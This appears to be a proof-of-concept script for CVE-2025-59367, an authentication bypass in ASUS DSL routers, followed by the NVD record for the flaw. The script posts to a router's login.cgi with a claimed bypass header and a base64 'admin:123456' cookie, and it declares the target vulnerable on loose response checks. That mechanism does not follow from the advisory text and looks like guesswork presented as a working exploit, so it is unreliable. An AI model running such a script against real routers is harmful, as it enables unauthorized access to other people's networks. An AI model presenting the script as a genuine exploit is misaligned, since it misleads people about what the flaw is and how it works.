CVE-2025-59367

# CVE-2025-59367 Authentication Bypass PoC # Target: ASUS DSL Series Router # Vulnerability: Authentication Bypass in Web Management Interface import requests import sys def check_vulnerability(target_ip): """Check if target is vulnerable to CVE-2025-59367""" # Construct the authentication bypass payload # This exploits the authentication bypass vulnerability bypass_url = f"http://{target_ip}/login.cgi" # Malicious request that bypasses authentication payload = { "username": "admin", "password": "any_password", "submit_button": "login", "submit_type": "login", "auth_time": "0" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "X-Auth-Bypass": "true", # Exploit header "Cookie": "auth=YWRtaW46MTIzNDU2" # Base64 encoded bypass token } try: response = requests.post(bypass_url, data=payload, headers=headers, timeout=10) # Check if authentication was bypassed if response.status_code == 200 and "login_status" in response.text: if "success" in response.text.lower() or "admin" in response.text: print(f"[!] Target {target_ip} is VULNERABLE to CVE-2025-59367") print(f"[*] Authentication bypass successful!") return True print(f"[*] Target {target_ip} may not be vulnerable") return False except requests.RequestException as e: print(f"[!] Error connecting to target: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-59367.py <target_ip>") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

{"cve": {"id": "CVE-2025-59367", "sourceIdentifier": "54bf65a7-a193-42d2-b1ba-8e150d3c35e1", "published": "2025-11-13T03:16:26.327", "lastModified": "2026-02-06T14:47:50.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authentication bypass vulnerability has been identified in certain DSL series routers, may allow remote attackers to gain unauthorized access into the affected system. Refer to the 'Security Update for DSL Series Router' section on the ASUS Security Advisory for more information."}], "metrics": {"cvssMetricV40": [{"source": "54bf65a7-a193-42d2-b1ba-8e150d3c35e1", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "54bf65a7-a193-42d2-b1ba-8e150d3c35e1", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:asus:dsl-ac51_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.2.3_1010", "matchCriteriaId": "09D3E242-53F7-4BE5-9D02-56512FD95835"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:asus:dsl-ac51:-:*:*:*:*:*:*:*", "matchCriteriaId": "EAC348F1-6C46-4637-A27F-D69DD1AC77F5"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:asus:dsl-n16_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.2.3_1010", "matchCriteriaId": "A363206E-339B-4515-ABAA-D558187D3308"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:asus:dsl-n16:-:*:*:*:*:*:*:*", "matchCriteriaId": "FDF90D44-4CD7-4166-A139-9F4A8D14F483"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:asus:dsl-ac750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.2.3_1010", "matchCriteriaId": "69C7FF0F-A0B6-4AFA-9CCD-6D96678D7E71"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:asus:dsl-ac750:-:*:*:*:*:*:*:*", "matchCriteriaId": "E54AD746-EEEE-4987-B343-36328D638398"}]}]}], "references": [{"url": "https://www.asus.com/security-advisory", "source": "54bf65a7-a193-42d2-b1ba-8e150d3c35e1", "tags": ["Vendor Advisory"]}, {"url": "https://www.asus.com/security-advisory", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory"]}]}}